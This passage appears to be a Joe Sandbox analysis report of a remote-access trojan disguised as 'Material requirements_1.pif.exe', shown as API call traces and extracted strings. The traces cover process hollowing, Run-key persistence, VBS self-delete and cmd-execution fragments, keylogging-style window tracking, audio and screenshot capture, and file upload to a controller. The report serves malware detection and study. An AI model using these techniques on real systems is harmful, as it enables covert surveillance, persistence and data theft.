                        • Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                        • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                        • Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                        • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                        • ResumeThread.KERNEL32(?), ref: 00417582
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                        • GetLastError.KERNEL32 ref: 004175C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                        • API String ID: 4188446516-3035715614
                        • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                        • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                        • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                        • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                        APIs
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                        • ExitProcess.KERNEL32 ref: 0041151D
                          • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                          • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                          • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                          • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                          • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                          • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                          • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                        • API String ID: 4250697656-2665858469
                        • Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                        • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                        • Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                        • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                        APIs
                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                        • ExitProcess.KERNEL32 ref: 0040C63E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                        • API String ID: 1861856835-3168347843
                        • Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                        • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                        • Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                        • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                        APIs
                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                        • ExitProcess.KERNEL32 ref: 0040C287
                        Similarity
                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                        • API String ID: 3797177996-1998216422
                        APIs
                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                        • SetEvent.KERNEL32 ref: 0041A39A
                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                        • CloseHandle.KERNEL32 ref: 0041A3BB
                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                        Similarity
                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                        • API String ID: 738084811-1408154895
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                        • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                        • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                        • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                        Similarity
                        • API ID: File$Write$Create
                        • String ID: RIFF$WAVE$data$fmt
                        • API String ID: 1602526932-4212202414
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000001,004068B2,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                        • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                        • GetProcAddress.KERNEL32(00000000), ref: 00406511
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                        • GetProcAddress.KERNEL32(00000000), ref: 00406525
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                        • GetProcAddress.KERNEL32(00000000), ref: 00406539
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                        • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                        • GetProcAddress.KERNEL32(00000000), ref: 00406561
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                        • API String ID: 1646373207-1655276172
                        APIs
                        • _wcslen.LIBCMT ref: 0040BC75
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Material requirements_1.pif.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                        • _wcslen.LIBCMT ref: 0040BD54
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Material requirements_1.pif.exe,00000000,00000000), ref: 0040BDF2
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                        • _wcslen.LIBCMT ref: 0040BE34
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                        • ExitProcess.KERNEL32 ref: 0040BED0
                        Similarity
                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                        • String ID: 6$C:\Users\user\Desktop\Material requirements_1.pif.exe$del$open$BG$BG
                        • API String ID: 1579085052-3202080899
                        APIs
                        • lstrlenW.KERNEL32(?), ref: 0041B1E6
                        • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                        • lstrlenW.KERNEL32(?), ref: 0041B217
                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                        • _wcslen.LIBCMT ref: 0041B2EB
                        • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                        • GetLastError.KERNEL32 ref: 0041B323
                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                        • lstrcatW.KERNEL32(?,?), ref: 0041B369
                        • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                        • GetLastError.KERNEL32 ref: 0041B380
                        Similarity
                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                        • String ID: ?
                        • API String ID: 3941738427-1684325040
                        APIs
                        Similarity
                        • API ID: _free$EnvironmentVariable$_wcschr
                        • String ID:
                        • API String ID: 3899193279-0
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                        • Sleep.KERNEL32(00000064), ref: 00412060
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Similarity
                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                        • String ID: /stext "$HDG$HDG$>G$>G
                        • API String ID: 1223786279-3931108886
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                        Similarity
                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                        • API String ID: 2490988753-744132762
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                        • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                        Similarity
                        • API ID: CloseEnumOpen
                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                        • API String ID: 1332880857-3714951968
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040A456
                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                        • GetForegroundWindow.USER32 ref: 0040A467
                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                        Similarity
                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                        • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                        • API String ID: 911427763-1497357211
                        APIs
                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                        • GetCursorPos.USER32(?), ref: 0041CB08
                        • SetForegroundWindow.USER32(?), ref: 0041CB11
                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                        • ExitProcess.KERNEL32 ref: 0041CB84
                        • CreatePopupMenu.USER32 ref: 0041CB8A
                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                        Similarity
                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                        • String ID: Close
                        • API String ID: 1657328048-3535843008
                        APIs
                        Similarity
                        • API ID: _free$Info
                        • String ID:
                        • API String ID: 2509303402-0
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                        • __aulldiv.LIBCMT ref: 00407FE9
                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                        Similarity
                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                        • API String ID: 1884690901-3066803209
                        APIs
                        • Sleep.KERNEL32(00001388), ref: 00409E62
                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                        Similarity
                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                        • API String ID: 3795512280-3163867910
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 004500C1
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                        • _free.LIBCMT ref: 004500B6
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 004500D8
                        • _free.LIBCMT ref: 004500ED
                        • _free.LIBCMT ref: 004500F8
                        • _free.LIBCMT ref: 0045011A
                        • _free.LIBCMT ref: 0045012D
                        • _free.LIBCMT ref: 0045013B
                        • _free.LIBCMT ref: 00450146
                        • _free.LIBCMT ref: 0045017E
                        • _free.LIBCMT ref: 00450185
                        • _free.LIBCMT ref: 004501A2
                        • _free.LIBCMT ref: 004501BA
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        APIs
                        • __EH_prolog.LIBCMT ref: 0041913D
                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                        • Sleep.KERNEL32(000003E8), ref: 0041927D
                        • GetLocalTime.KERNEL32(?), ref: 0041928C
                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                        Similarity
                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                        • API String ID: 489098229-65789007
                        APIs
                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                          • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                          • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                          • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                        • ExitProcess.KERNEL32 ref: 0040C832
                        Similarity
                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                        • API String ID: 1913171305-390638927
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        APIs
                          • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                        • GetLastError.KERNEL32 ref: 00454AA6
